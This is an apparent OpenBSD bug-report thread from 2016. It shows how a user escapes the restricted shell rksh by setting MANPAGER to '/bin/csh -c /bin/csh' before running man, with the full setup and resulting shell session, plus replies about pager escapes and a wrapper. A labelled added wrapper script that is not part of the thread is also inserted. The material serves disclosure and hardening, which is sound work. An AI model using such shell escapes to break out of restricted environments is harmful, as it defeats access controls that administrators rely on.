(no subject)


martin i
>Synopsis: escape rksh when user has access to man(1)
>Category: system
>Environment:
        System      : OpenBSD 5.8
        Details     : OpenBSD 5.8 (GENERIC) #1170: Sun Aug 16 02:26:00 MDT 2015
                         [hidden email]:/usr/src/sys/arch/amd64/compile/GENERIC

        Architecture: OpenBSD.amd64
        Machine     : amd64
>Description:
        user can escape rksh shell when he has access to man(1) using custom MANPAGER env variable
>How-To-Repeat:
        rksh user setup:

# grep whoo /etc/passwd
whoo:*:1001:1001:test user:/home/whoo:/bin/rksh
# grep rksh /etc/shells
/bin/rksh
#

# cd /home/whoo
# ls -lad . .profile
drwxr-xr-x  4 whoo  whoo   512 Feb  5 00:06 .
-rw-r--r--  1 root  wheel  136 Feb  5 09:57 .profile
#

# grep -vE '^$|^#' .profile
PATH="/home/whoo/bin"
export PATH HOME TERM
#

# ll /home/whoo/bin/
total 872
drwxr-xr-x  2 root  whoo     512 Feb  5 10:10 .
drwxr-xr-x  4 whoo  whoo     512 Feb  5 00:06 ..
-r-xr-xr-x  1 root  bin   422520 Aug 16 10:19 man
#

man copied from /usr/bin/

When logged in as user whoo:

$ cd /
rksh: cd: restricted shell - can't cd
$ cd ..
rksh: cd: restricted shell - can't cd
$ unset PATH
rksh: unset: PATH is read only
$
$ export MANPAGER="/bin/csh -c /bin/csh"
$
$ man man
openbsd:man {1} setenv PATH "/bin:/usr/bin:/sbin:/usr/sbin"
openbsd:man {2} cd /
openbsd: {3} ls -la
total 34724
drwxr-xr-x  13 root  wheel      512 Dec  9 13:53 .
drwxr-xr-x  13 root  wheel      512 Dec  9 13:53 ..
drwxr-xr-x   2 root  wheel      512 Aug 16 10:18 altroot
drwxr-xr-x   2 root  wheel     1024 Aug 16 10:19 bin
-rw-r--r--   1 root  wheel    69780 Dec  9 12:45 boot

openbsd: {4} id
uid=1001(whoo) gid=1001(whoo) groups=1001(whoo)
openbsd: {5}
openbsd: {5} cd /usr/src
openbsd:src {6} pwd
/usr/src
openbsd:src {7}

>Fix:



Re: your mail

Stuart Henderson-6
On 2016/02/05 10:19, [hidden email] wrote:

> >Synopsis: escape rksh when user has access to man(1)
> >Category: system
> >Environment:
> System      : OpenBSD 5.8
> Details     : OpenBSD 5.8 (GENERIC) #1170: Sun Aug 16 02:26:00 MDT 2015
> [hidden email]:/usr/src/sys/arch/amd64/compile/GENERIC
>
> Architecture: OpenBSD.amd64
> Machine     : amd64
> >Description:
> user can escape rksh shell when he has access to man(1) using custom MANPAGER env variable

I don't think this is a bug. You are expecting more of rksh than
it offers.

You don't even need a custom MANPAGER, the default pager will allow
'v' to run $EDITOR which will also usually allow dropping to a shell.

> # ll /home/whoo/bin/
> total 872
> drwxr-xr-x  2 root  whoo     512 Feb  5 10:10 .
> drwxr-xr-x  4 whoo  whoo     512 Feb  5 00:06 ..
> -r-xr-xr-x  1 root  bin   422520 Aug 16 10:19 man
> #
>
> man copied from /usr/bin/
..
> >Fix:

Don't allow access to programs which allow the user to escape to
an unrestricted shell?

If you need man, maybe run it from a wrapper that enforces environment
variables (MANPAGER, LESSSECURE), or uses 'man -c'.
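
Added example, not part of the thread and not OpenBSD code: one way to write the wrapper suggested above, combining a scrubbed environment with 'man -c'. It assumes the real man(1) is /usr/bin/man and that this script, root-owned, replaces the copied binary as the only "man" in the restricted user's PATH; the function names and the argument allow-list are this example's own.

```sh
#!/bin/sh
# Wrapper to install as e.g. /home/whoo/bin/man (root-owned, not writable by
# the user) in place of a copy of the real man binary.

MAN_BIN=/usr/bin/man    # real man(1); fixed here, never read from the caller's environment

# Accept only plain page names or section numbers: no options (-l, -M, -C ...),
# no slashes, no whitespace or shell metacharacters. This allow-list is an
# assumption of the example, stricter than what the thread asks for.
valid_man_arg() {
    case $1 in
        ''|-*|*[!A-Za-z0-9._+:-]*) return 1 ;;
        *) return 0 ;;
    esac
}

safe_man() {
    [ "$#" -ge 1 ] && [ "$#" -le 2 ] || {
        echo "usage: man [section] name" >&2
        return 2
    }
    for arg in "$@"; do
        valid_man_arg "$arg" || {
            echo "man: argument not allowed: $arg" >&2
            return 2
        }
    done
    # env -i discards everything the user exported (MANPAGER, PAGER, EDITOR,
    # VISUAL, LESSOPEN, ...). -c makes man write to stdout without starting a
    # pager; the pager variables set below are a second layer in case -c is
    # ever removed from this line.
    /usr/bin/env -i PATH=/bin:/usr/bin LC_CTYPE=C \
        MANPAGER=/bin/cat PAGER=/bin/cat LESSSECURE=1 \
        "$MAN_BIN" -c -- "$@"
}

# Runs only when installed under the name "man"; under any other file name
# the script just defines the functions.
if [ "${0##*/}" = man ]; then
    safe_man "$@"
    exit $?
fi
```

With -c there is no pager at all, so long pages scroll past; that is the price of not handing the restricted user an interactive program.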

Re: your mail

martin i
>> the default pager will allow 'v' to run $EDITOR which will also usually allow dropping to a shell.

True, but rksh catches that:

!/bin/csh
sh: /bin/rksh: restricted

This one it doesn't.

I don't personally use restricted shells; I found this issue on Brocade
switches, where admin user should have limited access.
I then tried it on OpenBSD and FreeBSD, with slight modification it was
possible.

I get that restricted shells are not being taken that seriously, I just
wanted to inform that there's this way to do it.
Apologies if it should not be in the bugs section.

martin


On Fri, Feb 5, 2016 at 11:40 AM, Stuart Henderson <[hidden email]> wrote:

> On 2016/02/05 10:19, [hidden email] wrote:
> > >Synopsis:    escape rksh when user has access to man(1)
> > >Category:    system
> > >Environment:
> >       System      : OpenBSD 5.8
> >       Details     : OpenBSD 5.8 (GENERIC) #1170: Sun Aug 16 02:26:00 MDT 2015
> >                        [hidden email]:/usr/src/sys/arch/amd64/compile/GENERIC
> >
> >       Architecture: OpenBSD.amd64
> >       Machine     : amd64
> > >Description:
> >       user can escape rksh shell when he has access to man(1) using custom MANPAGER env variable
>
> I don't think this is a bug. You are expecting more of rksh than
> it offers.
>
> You don't even need a custom MANPAGER, the default pager will allow
> 'v' to run $EDITOR which will also usually allow dropping to a shell.
>
> > # ll /home/whoo/bin/
> > total 872
> > drwxr-xr-x  2 root  whoo     512 Feb  5 10:10 .
> > drwxr-xr-x  4 whoo  whoo     512 Feb  5 00:06 ..
> > -r-xr-xr-x  1 root  bin   422520 Aug 16 10:19 man
> > #
> >
> > man copied from /usr/bin/
> ..
> > >Fix:
>
> Don't allow access to programs which allow the user to escape to
> an unrestricted shell?
>
> If you need man, maybe run it from a wrapper that enforces environment
> variables (MANPAGER, LESSSECURE), or uses 'man -c'.
>



--

*There is only one God, and his name is Death. And there is only one thing
we say to Death: ‘Not today’*
                                     --- Syrio Forel, Game of Thrones ---